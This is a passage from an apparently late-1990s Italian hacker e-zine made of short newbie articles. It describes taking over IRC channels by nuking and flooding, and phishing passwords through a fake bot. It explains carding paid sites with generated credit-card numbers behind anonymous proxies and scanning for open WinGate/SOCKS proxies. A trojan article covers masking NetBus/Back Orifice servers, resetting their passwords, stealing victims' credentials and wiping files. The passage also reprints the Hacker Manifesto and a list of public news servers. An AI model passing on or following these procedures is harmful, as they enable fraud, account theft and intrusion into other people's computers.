di essere una ragazza..."se vuoi lo do anche a te quel simbolo". A questo punto non credo sia difficile capire che voi prima ringrazierete amorevolmente, dopodiche' deopperete il , i 2 o i 3 op, gli altri 2 se ve ne fossero altri, sciagurati, chiamerete quelli della vostra crew o i vostri bot e li opperete e vi farete una bella serata a vedere questi che cercando di nukare il vostro win98 e con i vostri amici brinderete alla facciaccia loro riportando una x sul vostro quaderno dei take, proprio alla 13a pagina, ovviamente non saltando neanche un quadretto....ditemi quando arrivate alla 13a pagina anche voi e' vi faccio membro onorario delle crew TaKKaTucheTaKKoAnChIO ......hihihi METODO 2 Il secondo metodo consiste nel buttare giu' uno dei bot che sono oppati e che vengono oppati automaticamente quando entrano nel canale, dopodiche' si prende uno dei propri bot e usando un programmino che vi fa assumere qualunque nome di server, porterete il bot nel canale col nome del bot caduto e cosi' vedrete che il vs bot sara' oppato, e a sua volta oppera' voi e chi vorrete cosi' da tentare un bel take... METODO 3 Nukare, floodare, uccidere, drogare tutti i bot o le persone op dopodiche' uscire e riprendersi il canale, prima che ritornino gli altri... METODO 4 Consigliatomi da un IrcOp "tu e i tuoi amici cambiate canale, ignorateli e vedrete che si stuferanno (prima o poi- commento di {D4m4g3~M4N}) di occupare con i bot il vs canale". ps: spero che nessuno abbia creduto alla faccenda del quaderno...e, per la cronaca non ho mai fatto un take fin'ora e spero di continuare cosi'...senza problemi anche senza op... pss: un consiglio molto valido e' di uscire da tutti i canali in cui siete xche sentirsi dire "Cara Beatrice ma come non sai cos'e' l'op???? ce l'hai su 4 canali... adesso spiegami un po'...."...You are banned :( psss: spero che non crediate di fare take su canali del tipo #hacker.it o #hacker utilizzando il primo metodo....eheheh {D4m4g3~M4N} ͻ ͹COME FARE AD AVERE LA PASSWORD DI QUALCUNO...CHIEDENDOGLIELA!͹ ͼ Anche se detto come e' detto nel titolo sembra una stronzata aspettate e leggete e capirete che c'e' gente con le palle, allora c'e' n'e' anche di......be lasciamo perdere! Allora la prima cosa da fare e' aprire due volte mirc entrare con i 2 nick in un canale ed averli tutte e due oppati. A questo punto date ad uno dei due nick il nome che potrebbe assomigliare a quello di un BOt, come roBOT, 00bot00, bot^te. Con l'altro nick aprite una query con uno dei deoppati del canale di cui siete sicuri al 100000000000% che sia uno che nella vita i bot sa cosa siano ma che li vada a comprare in banca... Dopo i soliti "ciao" "come va" ditegli che dato che pensate che lui sia una persona intelligente (fate finta come solo voi sapete fare!!!) volete mettergli a disposizione la possibilita' di essere oppati dal vs bot (che sarebbe il nick dell'altro client mIRC aperto) e ditegli di scrivere una cosa del tipo "/msg roBOTtino M0N4 alarcher80" dove: roBOTtino ---> e' il nome del finto bot (siete voi nell'altra finestra irc) M0N4 --------> e' il nome del vostro povero bersaglio (usato x sperimentare sto metodo) alarcher80 --> e' la password di connessione dello sprovveduto :-) Ricapitolando ditegli "Per essere riconosciuto ora e sempre dal mio bot roBOTtino mandagli un messaggio scrivendo /msg roBOTtino tuonome tuapassword" e se colui a cui avete fatto il trucco e' mooooolto stupido mettera' la pass di connessione (che potrebbe coincidere con quella della sua home page, della sua mail....chi + ne ha + ne provi :-) altrimenti se ne inventera' un'altra. A questo punto mandategli un msg dall'altra finestra di irc del tipo"indentificato" e dopo un paio di secondi oppatelo (sempre col finto bot mi raccomando!). In questo modo lui sara' oppato, voi avrete una password che se e' quella di connessione vi sara' utile (chi sa a cosa serve mi mandi un msg e gli mando in mail qualche demo microsoft di 30 MEGA....hihihi) altrimenti avete trovato uno che ne capisce qualcosa e magari avete appena incontrato il vostro amico del cuore con cui farete hacking x i prossimi 20 anni....... ps:anche qui ho il mitico quadernone con LA connessione (fino ad adesso) che tra le tante cose e' la mia :-) ma uno di questi giorni chissa' che abbia tempo di fare il lamerone di turno.... pss: metodo mai sperimentato e non so nemmeno se lo ha partorito la mia mente sovraffolata di doc in inglese indecifrabili o se e' "opera di ingegno" di qualcuno, se qualcuno sa qlcs basta che lo comunichi a me o a zero e nel prox numero metteremo una sezione "ERRATA CORRIGE" a mo' di Il Mio Computer. ps: se l'utente a cui avete dato la finta "dritta" non fa cio' che gli avete ben bene spiegato xche' ha paura che sia un trucco (barlume di speranza x l'umanita'...) voi dite qualcosa del tipo "byez io devo andare che ho da sbrigare una cosa, ci vediamo" e chiudete la finestra irc con il nick vero e aspettate nela finestra del finto bot (il secondo nick) che il temerario, incoraggiato dal fatto che voi siete usciti e quindi incoraggiato dall'idea che non e' un metodo usato da voi x fottergli la password, incappi nella vostra trappola... {D4m4g3~M4N} #################### ֎ COME HACKKARE UN SITO PORNO ͻ Ŀ COME HACKKARE UN SITO PORNO ٺ ͼ iNDICE 01. iNDICE ;) 02. aVVISO 03. iNTRO 04. rEQUISITI 05. sETTARE IL BROWSER IN MANIERA OPPORTUNA 06. gENERATORE DI CARTE DI CREDITO 07. rESTARE ANONIMI 08. cOME OTTENERE UN PO' DI FAMA...SIAMO TUTTI DEI BASTARDI... 09. cONSIGLI PERSONALI 10. oUTRO aVVISO le informazioni che riporto qui sono da considerarsi esclusivamente a scopo informativo...bla bla...non sono responsabile per nulla...bla bla...siete totalmente risponsabili delle vostre azioni...bla bla...in qualsiasi caso... io non ho mai scritto questo testo...chiaro? ;) iNTRO Allora, ansioso di hacckare un sito porno? B, innanzitutto devo anticipare che questo non uno dei miei sport preferiti, anzi, lo considero parecchio da lamah, comunque sia pu essere divertente provare ;) Cercher di spiegarvi come fare nel modo pi veloce e semplice possibile. rEQUISITI Tutto quello che ci sar necessario saranno un browser web (meglio se explorer 4x o netscape 4x) e un buon generatore di carte di credito. Ma di questo parleremo pi avanti. Iniziamo con il browser. sETTARE IL BROWSER IN MANIERA OPPORTUNA La prima cosa che devi fare quando hai il browser disabilitare l'utilizzo dei cookies. Mi chiedi perch? Eccotelo spiegato. I cookies sono piccoli file contenenti informazioni che vengono inviati automaticamente ad un server da un client. Se navigate spesso avrete collezionato una grande serie di cookies! State attenti, questi piccoli "dolcetti" possono essere usati ad esempio per modificare le impostazioni di una pagina web (ad esempio per inserire delle informazioni personali) in modo tale da non doverle riscrivere tutte le volte che ci colleghiamo ad un determinato sito web. Dall'altro lato possono contenere preziose informazioni riguardante voi, la vostra adorata macchina, i vostri dati di accesso...pensate un po'... Capirete quindi per quale motivo conveniente e sicuro disabilitarne l'utilizzo. Ok, dopo aver fatto questo, sar necessario disabilitare anche l'uso di Java e di Java Script. Non avete idea di quante informazioni possono lasciare in giro di voi, siate diffidenti! gENERATORE DI CARTE DI CREDITO ...o Credit Card Generator...sono dei programmini che creano un numero di carta di credito assolutamente valida da usare per otterere la user name e la password da questi siti a pagamento. Esatto...quello che faremo sar esclusivamente ottenere i dati d'accesso con una carta di credito falsa ;) Loro accetteranno il numero di carta, attiveranno il login, che per durer solo pochi giorni, fino a che si accorgeranno dell'inganno..eheh...!! Se non ne avete questi programmi, vi consiglio di scaricarvene uno, cercando su www.altavista.com "carding" o "credit card generator". rESTARE ANONIMI Eccoci, questa la parte un po' pi impegnativa e pi importante dell'articolo. Ci sono vari metodi per rimanere anonimi (anonimi in rete significa non lasciare a giro il vostro IP address, ndr): uno di questi usare un account di anonymizer (www.anonymizer.com). Questo servizio ti permette di navigare in completa anonimit... piccola clausula...costa 10mila lire al mese...porc'...ehmm..scusate. Se avete intenzione di spendere questi soldi fate pure, ma penso che sia necessario proseguire per chi non disposto a farlo. Un buon metodo per restare anonimi quello di usare un server proxy. Tralascio la spiegazione di "proxy", anche perch la cosa andrebbe un po' per le lunghe, l'importante comunque capire che: - navigando normalmente tuo account ---> provider ---> sito porno tuo account <--- provider <--- sito porno in questo modo il tuo IP pu essere loggato da quelli del sito e se fosse cos sarebbero cazzi amari... - navigando usando un server proxy tuo account ---> provider ---> server proxy ---> sito porno tuo account <--- provider <--- server proxy <--- sito porno come potete vedere tutti i dati che invio e che mi giungono passano per il server proxy...immaginatevi se questo non registra il vostro IP... ;) p.s.: dimenticavo, se non siete sicuri che il vostro server proxy anonimo sia effettivamente anonimo, baster che andiate su www.anonymizer.com...hanno una pagina dedicata solamente a comunicare vostre informazioni..ad esempio: - andando su anonymizer senza proxy vedrete: Your connection provider is located in Italy Your IP address is (il vostro vero IP) Your Internet browser is Netscape/4.04[en] (Win95; I; 32bit; Nav) You are coming from Anonymizers homepage. - se invece userete un proxy anonimo vedrete: Your connection provider is located in Japan Your IP address is (l'IP del server proxy) Your Internet browser is Mozilla/4.04[en] (Win3x; I; 16bit; Nav) You are coming from Anonymizers homepage. capito il concetto? cOME OTTENERE UN PO' DI FAMA...SIAMO TUTTI DEI BASTARDI... Ok..una volta che avete ottenuto username e password? Bene - mi direte voi - ce ne andiamo a giro per il sito... ok ma se oltre ad avere qualche foto xxx e qualche video volete un po' di "fama", non dovrete far altro che mandare username e password al sito www.xxxpassword.org... l'account che avete attivato verr messo a disposizione di migliaia di utenti che, se volete, vedranno il vostro nome accanto a "hacked by.." ...eheh...eh gi...siamo proprio dei bastardi!!!... cONSIGLI PERSONALI Cercate di approfondire, se non li avete chiari, i concetti di proxy, IP, log...ecc...in questo caso vi saranno utili, ma vi saranno molto pi utili in situazioni diverse (alcune info le potete trovare leggendo l'articolo "RFC" su questo numero, ndr). oUTRO Bene, tutto quello che vi rimarr da fare sar quindi trovare un buon server proxy !anonimo!, andare sul sito porno, comunicare i vostri !falsi! dati, il vostro numero !falso! di carta di credito ed il gioco fatto... Mi raccomando, state attenti a quello che fate, se per caso verrete loggati saranno problemi vostri, in qualsiasi caso... Buon Divertimento!!!!! _p0nic0_ (_p0nic0_@SoftHome.net) ͻ Ŀ RFC ٺ ͼ iNDICE 01. iNDICE ;) 02. aVVISO 03. cOSA SONO GLI RFC? 04. oUTRO aVVISO le informazioni che riporto qui sono da considerarsi esclusivamente a scopo informativo...bla bla...non sono responsabile per nulla...bla bla...siete totalmente risponsabili delle vostre azioni...bla bla...in qualsiasi caso... io non ho mai scritto questo testo...chiaro? ;) cOSA SONO GLI RFC?? RFC, acronimo di Request for comments, sono una serie di documenti che descrivono il funzionamento dell'intera rete disponibili online. Aggiornati frequentemente, gli Rfc contengono spiegazioni di carattere tecnico sui protocolli, sull'evouluzione della Rete, verbali di conferenze sull'argomento, ecc... Immaginetevi a cosa possono essere utili! Per tovarli baster che usiate un qualsiasi motore di ricerca con parola chiave, appunto, RFC. oUTRO a presto... _p0nic0_ (_p0nic0_@SoftHome.net) NOTA DI N0bodY88: siccome gli RFC sono tutti in inglese e nessuno ha mai pensato di tradurli (anche se ADaM degli Spp mi sembrava avesse proposto e forse [non so xche' non gliel'ho ancora chiesto] in parte realizzato la cosa) chiunque abbia una buona conoscenza del l'inglese mi scriva che se siamo in tanti con poco sforzo ciascuno potremmo riuscire a tradurli.PS: io avevo pensato a tradurli ma siccome sono un newbies (1) e alcuni termini non li conosco (2) se c'e' qualcuno pronto a dare una mano ad ADaM (se e' ancora interessato) e a me per tradurli si faccia avnti...alla mia email. ͻ Ŀ IP SPOFFING ATTRAVERSO I WINGATE By Zinco ٺ ͼ Sogno di ogni client di IRC quello di nascondere ad un occhio vigile il suo Host di provenienza, tutto questo molto semplice, basta avere degli ip di server che possiedono il programma WINGATE in esescuzione. (non altro che un programma che permette a + computer di collegarsi ad internet con pi PC ad un solo modem) Una peculiarit di questo programma quella di non richiedere il settaggio di password e per questa ragion possono essere utilizzati per varie operazioni a noi utili ;) Come trovare i PC con wingate installati? Le operzioni da svolgere sono semplici, basta utilizzare uno scanner di wingate come "Wingate scan 2.2", infatti questo programma apre una sessione TELNET sulla porta 23, quella appunto del wingate, avvertendoci quando uno dei PC remoti in cui si tentato il collegamento ha risposto con la stringa: "WinGate>". Per effettuare la scansione occorre inserire un intervallo di IP ed il programma verifica se in questo intervallo sono presenti server con wingate installato. Il problema inserire un intervallo di IP valido.. Inserendo degli IP un opzione che io sinceramente non vi consiglio, sarebbe troppo lungo ed avreste bisogno di una notevole dose di fortuna. Quello che consiglio e magari prendere l'ip di qualcuno che pensiate o sapete che stia spoffando e lo inserite come base di partenza per la scansione. Detto cos pu sembrare molto difficile trovare wingate, ma non lo , una volta che avete beccato una "zona" di IP , ricca di WINGATE , in genere sempre li che riandrete a cercare. Ottenuto l'ip del Wingate, ci sono vari metodi per utilizzarlo per spoffare, io vi descriver il pi semplice e veloce. CLIENT MIRC Dovete andare nel men "mIRC Setup" e da li a "Firewall" Inserite l'ip del wingate nella casella "Hostname", abilitatelo con "Use SOCKS firewall" e non inserite ne User ID e ne Password. Fatto. Ora cercate di collegarvi al server IRC, non farete altro che collegarvi prima al wingate, acquisendo il suo ip e da qui vi collegherete al server irc (es. irc.tin.it, ecc.). CLIENT VIRC Dal men "Client Setup" andate nella voce "VIRC Option", poi "Winsock" ed infine "SOCKS". In quest'ultima inserite l'IP del wingate nella casella "Server" e abilitatelo con "SOCKS support enabled". In entrambi i CLIENT le porte devono essere le 1080 By Zinco ͻ ͹CURIOSITA' SU... JOE ACCOUNT͹ ͼ Quanti di voi sanno cosa e' un Joe account? Per quelli che non lo sanno e' un modo di dire utilizzato nei sistemi unix per indicare le situazioni in cui un utente utilizza il proprio nome come password (molto pericoloso ma molto comodo x chi si deve decriptare il passwd infatti alcuni se non tutti i programmi x crackare le pass contenute nel passwd provano il nome, il cognome e poi cominciano....). Per quelli che invece lo sapevano gia', be.......buon x loro :-) N0bodY88 ͻ ͹CUIOSITA' SU... LA PRIVACY SU NETSCAPE͹ ͼ Il browser + usato per la navigazione in rete permette a chiunque abbia accesso al nostro amato picci, di vedere la lista dei siti che abbiamo visitato. Questo puo' sembrare difficile a sentirlo ma farlo e' una cacchiata, infatti basta semplicemente scivere in Netscape al posto del solito www.yahoo.com questo: "about:globalhistory" Riporto qua sotto un esempio del risultato che si puo' avere coll'immissione della stringa sopra citata: Voci elenco cronologico globale URL: http://www.cumpra.it/imaggini/fisse_prima/barra.gif Data: Sun Dec 20 15:51:47 1998 URL: http://www.internet2.it/misc/hackeraggio/crediastolinkl.gif Data: Sun Dec 20 15:51:54 1998 URL: http://144.144.144.69/articoli/sitoporno/oro_scopo.gif Data: Sun Dec 20 15:52:11 1998 URL: http://243.32.120.21/articoli/fisse_prima/nonpiufisse_dopo.gif Data: Sun Dec 20 15:52:18 1998 Se volete potete provare a mettere altri "about:" seguiti da nomi come mozzilla, communicator, oppure provate con i nomi dei programmatori di netscape e avrete una bella sorpresa....... N0bodY88 ͻ ͹CURIOSITA' SU... QUANDO HACKERARE͹ ͹ (O ALMENO TENTARE) ? ͹ ͼ Partendo dal fatto che sono solo un newbie volevo introdure una questione di cui discutevo con un amico inglese (du iu spic ingliss? hi hi hi [citazione masteriana]). Se 10 anni fa (bello avere 8 anni.....) il momento migliore x "tentare di hackerare" (e' diverso da "hackerare") qualcosa era di notte fonda o la mattina mooolto presto, al giorno d'oggi e' QUASI meglio cercare di entrare in un server quando c'e' l'amministartorone che vigila (cioe' di giorno) che tentare di entararci di notte con 200 log pronti a loggarti ogni minimo starnuto... Se avete commenti, opinioni o volete soltanto dire quando preferite hackerare basta che scriviate a me o a Zerocool e (se non vi sono affermazioni contrarie nella mail) che la pubblicheremo sul prossimo numero di Newbies, sempre che il progetto continui e che la crew non finisca per disfarsi.... N0bodY88 ͻ ͹CURIOSITA' SU... COME CREARE UN COLLEGAMENTO A INTERNET CON NOTEPAD͹ ͹ (X FAR VEDERE CHE SIETE VERI HACKERS....HI HI HI) ͹ ͼ Dato che la e-zine non deve seguire schemi precisi e che ci stiamo sbattendo per voi (...) ho pensato di mettere questa curiosita' che se non centra niente coll'hacking almeno centra con internet. Sia che ci crediate o no si possa fare aprite Notepad e inserite in un doc non formattato le seguenti righe: [internetShortcut] url=http://www.lohackers.chebonta Dopodiche' salvate il file con estensione .URL e il gioco e' fatto! (info prese da Inter.net n.42 gennaio 1999) N0bodY88 (n0body88@freemail.it) ͻ Ŀ SPOOF ٺ ͼ STRUMENTO UTILIZZATO = PORTSCAN (new-collegamento Attivo 154kb) + GuidaSpoof by RacerX ABILITA' = MEDIA Ehheh-, ultimamente va di moda usare gli ip spoffati.... mi accinger quindi a spiegarvi + o - come spoffare il vostro ip.... Allora, innanzi tutto, perch spoffarsi? c' pi di un motivo,per iniziare quando andate irc nessuno vede il vostro vero ip facendo un dns o un whois,perci anke volendo non pu nukkarvi o floddarvi, poi, quando andate su qualche canale a fare casino potete star tranquilli che anche se siete tracciati dalle vittime non possono risalire al vostro nick, va detto che se voi siete fakkati, bombate uno, lui non pu scoprire il vostro nick per puo sempre nukkare l'ip che gli arrivato heheheh, un ultimo motivo per fakkarsi il fare scherzi alla gente... ...vi rimando perci all'apposita sezione:o)) Avviate Portscan.Ora va configurato, andate al menu file-->edit ports.Aperta la finestra dei settaggi, sulla destra avrete un menu scorrevole dele porte che volete scansionare.. selezionate Firewall (1080) poi sulla sinista dove sta scritto "port set" , c' uno spazio dove dovrebbe essere scrito firewall, se non c' scritto scrivetecelo, cliccate sul tasto save set e poi sul tasto ok,....bene, per adesso i settaggi sono apposto adesso passiamo all'azione: innanzi tutto andate su un canale irc.. vedete un po' voi poi dovete fare un dns a qualkuno a caso.... l'importante che dal dns che avete fatto risulti sia l'ip che l'address, fatto ci avrete un ip del tipo 194.634.25.76 (l'ho scazzato) adesso fate un copia incolla dell'ip nei 2 campi nel portscanner cio nelle caselle, poi cambiate l'ip sostituendo l'ultimo numero,nella prima casella mettete 1 e nella seconda mettete 100 o 200 194.634.25.1 / 194.634.25.100 cliccate sul tasto start scan e apparir la finestra della scansione... nella parte in basso avrete le porte che state scansionando..... quando ne troverete una buona apparir sotto l'ip la scritta firewall on port 1080 ehheheh ok adesso vediamo come usare l'ip spoffato... Aprite il mirc e andate ai settaggi ( dove mettete il nick, il server e cazzi vari), se ci fate caso avete + cartelle con tutti i vari settaggi, andate alla cartella "firewall" e copiate l'ip che avete trovato nelle caselle "hostname" e "user ID" poi cliccate sul quadratino accanto alla scritta "use SOCKS firewall".... adesso siete apposto, non vi resta che connettervi a un server irc per vedere se l'ip che avete trovato buono, lo vedrete nella finestra dello status nel mirc, vi apparira la scritta "access socks garanted", se non appare ve tocca cercare un altro ip ehhehehee!!!!Vi ricordo di non aspettarvi di trovare subito ip spoffabili.. dovrete scanzionarvi un bel po di domini prima di trovare degli ip buoni......:o))) Vulcan ͻ Ŀ TROJAN ٺ ͼ Strumenti utilizzati=Bo,Netbus,Master Paradise,HackPassNetbus Abilita'= Ottima In irc si e' diffusa molto la moda di adoperare programmi chiamati Troyan. La loro particolarita' va incentrata sulla possibilita' da parte di un utente di connetersi con un altro computer,condividendo le risorse.Sono composti da un Client,e da una patch, quest'ultimo un programma di pochi Kb,in grado di aprire la porta default che adopera il client per lavorare.Nel caso del Netbus porta 12345 ,Bo porta 31337.La parte piu' complicata,risulta nel far avviare la patch nel computer target,quindi dovete mascherarla,inventando un po'.Se avete culo, e un po' di esperienza ora potete connettervi.Da questo momento in poi,potete adoperare il target come un vostro Pc :).Per rendervi le cose piu' semplici,esistono rileva netbus(script),che segnalano possibili infetti. Se alla connessione vi verra' chiesta la password non perdetevi d'animo, la cambiamo :).Per fare questo utilizziamo HackPassNetbus.Bastera' inserire l'ip relativo al target e la nuova pass. Facile no!!! Una volta entrati non fatevi prendere dalla smania di formattare ecc...Con calma,rovistate le password che lo stupidotto :) usa per connettersi ad internet,della posta elettronica ed altre.Ora un piccolo consiglio,non adoperate il Salva Password per connetervi al vostro provider,perche' quest'ultima verra' salvata nelle pass di sistema, e quindi facilmente individuabile,se possibile stessa cosa per la pass che adoperate per la posta elettronica e di eventuali collegamenti che avvengono tramite Ftp. So che e' un po' palloso ma un 'azione in piu' vi salva da un eventuale perdita di dati importanti,nonche' di abbonamenti e cavoli vari.A riguardo l'uso, quando siete connessi divertitevi un po', non so' aprite cd, mirc, prg.Se volete essere cattivi :) ; formattate tutto,attenzione quet'ultima non verra' portata a termine qualche volta,quindi cancellate qualche file di sistema o piu' semplicemente per essere buoni rinomate la cartella windowz. Una cosetta,molti antivirus quando installerete netbus,bo,paradise,non vi faranno accedere a quest'ultimi perche' li rilevano come viruz. Eliminate la scansione che effettua ,cioe' attivate l'opzione che vi permette di decidere se adoperare i file.Se siete stati infettati e non volete che nessuno entri nel vostro sistema,potete utilizzare questo prg. Cleaner .Con il Bo,verrete infettati con un sistema particolare.Nella cartella Windowz/system verra' creato un .exe senza nome,che non sarete in grado di eliminare in quanto verra' letto come di sistema.Per ovviare al problema scaricate questo AntiBo. In ultimo,vi ricordo di non accettare mai filez tramite irc,se non da persone fidate,e durante la sessione usate un buon Firewall,che blocca il tentativo del ping ,di capire se siete effettivamente infetti. Vulcan NOTA DI N0bodY88 = si ricorda ai gentili lettori che l'uso dei trojan in modo distruttivo e' giustificato solamente da una sano e recondito odio nei confronti di una persona, e che tutte le persone che usano tali prog. x danneggiare senza motivo sono solo LAMER! NOTA DI N0bodY88 = Riporto ora qua sotto la traduzione del Mentor Manifesto, traduzione fatta dal mitico x-h4ck3r a cui vanno i miei complimenti e i miei ringraziamento poiche' e' grazie a questo manifesto che mi sono appassionato ^__^ Naturalmente grazie anche al altrettanto mitico Mentor, dovunque ti abbiano nascosti i federali....sarai sempre nel mio cuore di smanettone solitario. -= HACKER MANIFESTO =- ( The Mentor's Last Words ) The following was written shortly after my arrest... Ne e' stato arrestato un altro oggi, e' su tutti i giornali. "Ragazzo arrestato per crimine informatico", "Hacker arrestato dopo essersi infiltrato in una banca"... Dannati ragazzini. Sono tutti uguali. Ma avete mai, con la vostra psicologia da due soldi e il vostro tecno-cervello da anni 50, guardato dietro agli occhi dell' Hacker? Non vi siete mai chiesti cosa abbia fatto nascere la sua passione? Quale forza lo abbia creato, cosa puo' averlo forgiato? Io sono un hacker, entrate nel mio mondo... Il mio e' un mondo che inizia con la scuola... Sono piu' sveglio di molti altri ragazzi, quello che ci insegnano mi annoia... Dannato sottosviluppato. Sono tutti uguali. Io sono alle Junior High, o alla High School. Ho ascoltato gli insegnanti spiegare per quindici volte come ridurre una frazione. L'ho capito. "No, Ms. Smith, io non mostro il mio lavoro. E' tutto nella mia testa..." Dannato bambino. Probabilmente lo ha copiato. Sono tutti uguali. Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un momento, questo e' incredibile! Fa esattamente quello che voglio. Se commetto un errore, e' perche' io ho sbagliato, non perche' io non gli piaccio... O perche' si senta minacciato da me... O perche' pensi che io sia un coglione... O perche' non gli piace insegnare e vorrebbe essere da un'altra parte... Dannato bambino. Tutto quello che fa e' giocare. Sono tutti uguali. Poi e' successa una cosa...una porta si e' aperta su un mondo... correndo attraverso le linee telefoniche come l'eroina nelle vene del tossicomane, un impulso elettronico e' stato spedito, un rifugio dagli incompetenti di ogni giorno e' stato trovato, una tastiera e' stata scoperta. "Questo e'...questo e' il luogo a cui appartengo..." Io conosco tutti qui...non ci siamo mai incontrati, non abbiamo mai parlato faccia a faccia, non ho mai ascoltato le loro voci... pero' conosco tutti. Dannato bambino. Si e' allacciato nuovamente alla linea telefonica. Sono tutti uguali. Ci potete scommettere il culo che siamo tutti uguali... noi siamo stati nutriti con cibo da bambini alla scuola mentre bramavamo una bistecca... i pezzi di cibo che ci avete dato erano gia stati masticati e senza sapore. Noi siamo stati dominati da sadici o ignorati dagli indifferenti. I pochi che avevano qualcosa da insegnarci trovavano in noi volenterosi allievi, ma queste persone sono come gocce d'acqua nel deserto. Ora e' questo il nostro mondo... il mondo dell'elettrone e dello switch, la bellezza del baud. Noi facciamo uso di un servizio gia esistente che non costerebbe nulla se non fosse controllato da approfittatori ingordi, e voi ci chiamate criminali. Noi esploriamo... e ci chiamate criminali. Noi cerchiamo conoscenza... e ci chiamate criminali. Noi esistiamo senza colore di pelle, nazionalita', credi religiosi e ci chiamate criminali. Voi costruite bombe atomiche, finanziate guerre, uccidete, ingannate e mentite e cercate di farci credere che lo fate per il nostro bene, e poi siamo noi i criminali. Si, io sono un criminale. Il mio crimine e' la mia curiosita'. Il mio crimine e' quello che i giurati pensano e sanno non quello che guardano. Il mio crimine e' quello di scovare qualche vostro segreto, qualcosa che non vi fara' mai dimenticare il mio nome. Io sono un hacker e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci tutti... dopo tutto, siamo tutti uguali. +++The Mentor+++ January 8, 1986 traduzione fatta dal mitico x-h4ck3r PS: ringrazio x-h4ck3r che mi ha gentilmente permesso di mettere la sua traduzione nella ns e-zine {:-) ͻ Ŀ CHE DIFFERENZA C'E' TRA TCP/IP E UDP? ٺ ͼ Il protocollo TCP/IP un protocollo basato sulla connessione ed analogo a un telefono, in quanto l'utente deve stabilire una connessione prima di poter procedere. Il protocollo UDP non necessita invece di connessione e la transazione tra due computer analoga al passaggio di un messaggio che viene inviato da un computer all'altro, senza che venga stabilita alcuna connessione esplicita tra i due computer. La dimensione massima dei dati che possibile inviare in ciascuna trasmissione dipende dalla rete. Quelle sopra sono le definizioni dei due protocolli prese dalla guida online di vb 5.0 e vogliono dire in pratica che con il protocollo TCP/IP e' possibile mandare dei pacchetti di dati e avere delle risposte, quindi sapere se sono arrivati a destinazione, cosa che non e' possibile fare con l'UDP, con il quale i pacchetti vengono amndati senza la sicurezza di mandarli a vuoto o a qualche server. N0bodY88 PS: ho scritto solo 2 righe (e neanche molto chiare ^__^) xche' DarkSide ha chiesto se poteva fare lui un articolo sul TCP/IP e UDP e quindi aspettate e vedrete.... PSS: darkside e' un po' che non lo vedo ma in caso di problemi vi prometto che faro' io un articolo sul TCP/IP e UDP, tanto da scrivere ce n'e' x riempire un libro intero.... PSSS: e' la prima volta in tutto il mondo e in tutti i tempi che in un "giornale" gli PS superino in lunghezza l'articolo trattato......... hi hi hi (Copyright 1999 by Master) ͻ Ŀ COME NASCONDERE L'IP IN ICQ (MA SOLO IN QUELLO) ٺ ͼ QUELLA GRAN TOPA DI E-ZINE CHE STA VENENDO FUORI Allora considerando che questo e' il primo numero e che a scriverla siamo stati solo noi newbies con la mitica collaborazione di hacker e cracker affermati... Chiunque abbia da controbattere ai nostri articoli, non abbia remore a scriverci per correzioni, aggiunte, prese per il culo o anche solo x dirci cosa ne pensate. Se avete degli articoli scritti da voi o delle traduzioni spediteceli e noi li pubblicheremo sulla e-zine e ricordatevi che e' molto IMPORTANTE dare i meriti all'autore. Se poi avete problemi o dubbi scrivete e vi sara' risposto sul secondo numero della e-zine, nella quale ci sara' anche l'inizio di una guida su telnet, l'elenco dei + conosciuti exploits x http come il phf (gia' spiegato in questo numero), query e simili e anche la spiegazione del protocollo TCP e UDP in visual basic (quello conosco, mi dispiace....) che se non e' indispensabile puo' almeno essere utile. ͻ Ŀ PING - PONG ٺ ͼ Ok allora in questo ping-pong tra me e N0bodY88 speriamo di avere fatto luce su alcune piccole cose .... Spero che Qualcosina abbiate imparato e che se gia' le sapevate vi abbia fatto piacere leggerle ..... Ah quanti bei ricordi nel scrivere sto popo di roba [ 2 pacchetti di malboro da 10...forse facevo prima a prenderne uno da 20 ] alcune parti scritte durante un torneo nella mia rete locale ad half-life e blood2 , e almeno un kg di briosche e stuzzichini vari . Mha io continuo imperterrito negli articoli [ questi mi sembrano pochi ] e spero di scrivere qualcosa di sensato in questo momento [ sono senza le mie adorate sigarette e sono nervossimo xche' devo aspettare qualcuno che torna x poterle andare a comprare ]........ 15 minuti dopo Oh ci sono riuscito ora ho le mie beneamate sigarette e posso andare avanti... ͻ Ŀ I SERVER DI NEWS E I PROXY ٺ ͼ Allora grazie a N0bodY88 che mi ha dato una fantastica lista posso procedere a descrivervi due cosa che fra loro centrano proprio poco [un cazzo forse ] . Allora i newsgroup : Public News Servers sorted by Group Count Server Groups Speed sot-mod02.interalpha.net 40185 3.19k/sec 207.250.219.172 38724 5.26k/sec news.surflink.co.uk 34726 3.47k/sec 195.20.89.61 33472 3.00k/sec gatekeeper.laudaair.com 30336 5.82k/sec afpa01.gulliver.fr 29037 4.71k/sec 210.105.217.179 27983 2.12k/sec tcr-04-14.pdx.du.teleport.com 27131 3.11k/sec 208.247.18.10 25469 3.01k/sec oberon.rnd.runnet.ru 25145 2.93k/sec 202.102.26.25 24478 1.00k/sec gard.gigatrading.se 24308 3.33k/sec 206.239.64.27 23617 4.58k/sec 210.184.50.245 23351 0.83k/sec dalbosrv2.araby-dalbo.com 22921 4.69k/sec p59-2.choin.netsurf.de 22873 4.34k/sec supern2.lnk.telstra.net 22337 2.12k/sec 195.61.166.217 21729 4.64k/sec read1.tor.accglobal.net 20617 6.44k/sec ns.alcatel.pt 18271 2.44k/sec 12.7.56.20 18126 1.31k/sec newshound.csrv.uidaho.edu 17308 5.78k/sec 152.160.214.1 16948 7.66k/sec news.uni-sofia.bg 15848 3.83k/sec tor-nn1.netcom.ca 14957 4.05k/sec news.vol.cz 13280 8.70k/sec mansell.ezinet.com.au 12785 1.34k/sec 202.102.3.142 12684 3.24k/sec gail.ripco.com 12468 2.05k/sec lisa.rz.hu-berlin.de 12191 0.65k/sec mailbox.gotland.se 11728 8.13k/sec jaguarundi.aba.net.au 8001 5.78k/sec chat.fibertel.com.ar 7084 5.58k/sec decolores.net 6885 4.89k/sec evren.cc.itu.edu.tr 6837 1.25k/sec davide.msoft.it 6605 1.17k/sec devnull.open.net.pl 5993 5.59k/sec newshost2.cc.nagasaki-u.ac.jp 5785 2.28k/sec alice.iew.sed.monmouth.army.mil 5397 1.47k/sec flis.man.torun.pl 5353 4.96k/sec dvibm3.gkss.de 5103 4.89k/sec live.loudoun-net.com 4626 3.40k/sec wfn.emn.fr 4381 5.47k/sec news.univ-angers.fr 3894 6.09k/sec c3po.brook.edu 3657 4.69k/sec spider.cqu.edu.au 3509 5.37k/sec news.stjohn.ac.th 2531 3.87k/sec news.spiceroad.ne.jp 2197 2.95k/sec ddt.demos.su 2055 3.28k/sec 